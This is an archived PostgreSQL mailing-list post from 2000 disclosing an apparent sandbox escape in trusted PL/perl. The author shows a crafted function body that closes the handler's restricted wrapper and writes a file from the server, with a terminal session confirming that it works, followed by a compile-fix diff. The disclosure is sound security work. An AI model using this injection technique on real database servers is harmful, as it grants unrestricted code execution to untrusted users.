possible security problem with PL/perl

From: ts <decoux(at)moulon(dot)inra(dot)fr>
To: pgsql-general(at)postgresql(dot)org
Subject: possible security problem with PL/perl
Date: 2000-03-06 07:07:17
Message-ID: 200003060707.IAA23017@moulon.moulon.inra.fr
Lists: pgsql-general

I was looking at the PL/Tcl and PL/perl extensions, with a view to writing
an extension for another language, when I found a possible problem with
PL/perl.

My configuration :
* PostgreSQL 6.5.3
* plperl extract from postgresql-7.0beta1.tar.gz
* perl 5.005_03

At the end of this message is my modification to compile it under 6.5.3, if
somebody wants to verify it (modification of some constants only:
FUNC_MAX_ARGS, PROCOID and TYPEOID).

The README file says:

------------------------------------------------------------
-- here is one that will fail. Creating the function
-- will work, but using it will fail.
-- NOTE(review): the body below tries to open a file for writing from
-- inside a plperl function; per the README's own wording, the refusal is
-- expected at call time (the SELECT), not at CREATE FUNCTION time.
CREATE FUNCTION badfunc() RETURNS int4 AS '
open(TEMP, ">/tmp/badfile");
print TEMP "Gotcha!\n";
return 1;
' LANGUAGE 'plperl';

-- Calling the function is the step the README says will fail.
SELECT badfunc();
------------------------------------------------------------

Here is my example:

------------------------------------------------------------
aestivum% pwd
/var/postgres/pl/plperl
aestivum% ls -alg /tmp/badfile
ls: /tmp/badfile: No such file or directory
aestivum% cat README

CREATE FUNCTION plperl_call_handler() RETURNS opaque
AS '/var/postgres/pl/plperl/plperl.so' LANGUAGE 'C';

CREATE TRUSTED PROCEDURAL LANGUAGE 'plperl'
HANDLER plperl_call_handler
LANCOMPILER 'PL/Perl';

CREATE FUNCTION badfunc() RETURNS int4 AS '
} ]), eval( q[ sub {
open(TEMP, ">/tmp/badfile");
print TEMP "Gotcha!\n";
return 1;
' LANGUAGE 'plperl';

SELECT badfunc();

aestivum% psql toto < README

CREATE FUNCTION plperl_call_handler() RETURNS opaque
AS '/var/postgres/pl/plperl/plperl.so' LANGUAGE 'C';
CREATE

CREATE TRUSTED PROCEDURAL LANGUAGE 'plperl'
HANDLER plperl_call_handler
LANCOMPILER 'PL/Perl';
CREATE

CREATE FUNCTION badfunc() RETURNS int4 AS '
} ]), eval( q[ sub {
open(TEMP, ">/tmp/badfile");
print TEMP "Gotcha!\n";
return 1;
' LANGUAGE 'plperl';
CREATE

SELECT badfunc();
badfunc
-------
1
(1 row)

EOF
aestivum% ls -alg /tmp/badfile
-rw------- 1 postgres postgres 8 Mar 6 07:31 /tmp/badfile
aestivum%
aestivum% cat /tmp/badfile
Gotcha!
aestivum%

------------------------------------------------------------

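There is no failure and the file is created, even though the language was
created as TRUSTED. The only difference from the README example is the first
line of the function body, `} ]), eval( q[ sub {`; presumably it closes the
construct that the handler wraps around the body, so that the rest is compiled
by a plain eval instead of the restricted one.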

Can someone verify whether this problem:
1) is real
2) still exists in postgres 7.0beta1

Thanks,

Guy Decoux

ps: I'm not subscribed to this mailing list

------------------------------------------------------------
aestivum% diff -u plperl.c~ plperl.c
--- plperl.c~ Sun Feb 20 09:00:27 2000
+++ plperl.c Mon Mar 6 07:14:39 2000
@@ -86,10 +86,10 @@
Oid result_in_elem;
int result_in_len;
int nargs;
- FmgrInfo arg_out_func[FUNC_MAX_ARGS];
- Oid arg_out_elem[FUNC_MAX_ARGS];
- int arg_out_len[FUNC_MAX_ARGS];
- int arg_is_rel[FUNC_MAX_ARGS];
+ FmgrInfo arg_out_func[MAXFMGRARGS];
+ Oid arg_out_elem[MAXFMGRARGS];
+ int arg_out_len[MAXFMGRARGS];
+ int arg_is_rel[MAXFMGRARGS];
SV* reference;
} plperl_proc_desc;

@@ -490,7 +490,7 @@
/************************************************************
* Lookup the pg_proc tuple by Oid
************************************************************/
- procTup = SearchSysCacheTuple(PROCOID,
+ procTup = SearchSysCacheTuple(PROOID,
Object
IdGetDatum(proinfo->fn_oid),
0, 0,
0);
if (!HeapTupleIsValid(procTup))
@@ -505,7 +505,7 @@
* Get the required information for input conversion of the
* return value.
************************************************************/
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum
(procStruct->prorettype),
0, 0,
0);
if (!HeapTupleIsValid(typeTup))
@@ -535,7 +535,7 @@
proc_internal_args[0] = '\0';
for (i = 0; i < proinfo->fn_nargs; i++)
{
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum(procStr
uct->proargtypes[i]),

0, 0, 0);
if (!HeapTupleIsValid(typeTup))
@@ -720,7 +720,7 @@
/************************************************************
* Lookup the pg_proc tuple by Oid
************************************************************/
- procTup = SearchSysCacheTuple(PROCOID,
+ procTup = SearchSysCacheTuple(PROOID,
Object
IdGetDatum(proinfo->fn_oid),
0, 0,
0);
if (!HeapTupleIsValid(procTup))
@@ -1041,7 +1041,7 @@
* Lookup the attribute type in the syscache
* for the input function
************************************************************/
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum(tupdesc->attrs[attnum - 1]->a
tttypid),
0, 0,
0);
if (!HeapTupleIsValid(typeTup))
@@ -2058,7 +2058,7 @@
* Lookup the attribute type in the syscache
* for the output function
************************************************************/
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum(tupdesc->att
rs[i]->atttypid),
0, 0,
0);
if (!HeapTupleIsValid(typeTup))
@@ -2134,7 +2134,7 @@
* Lookup the attribute type in the syscache
* for the output function
************************************************************/
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum(tupdesc->att
rs[i]->atttypid),
0, 0,
0);
if (!HeapTupleIsValid(typeTup))
aestivum%

------------------------------------------------------------
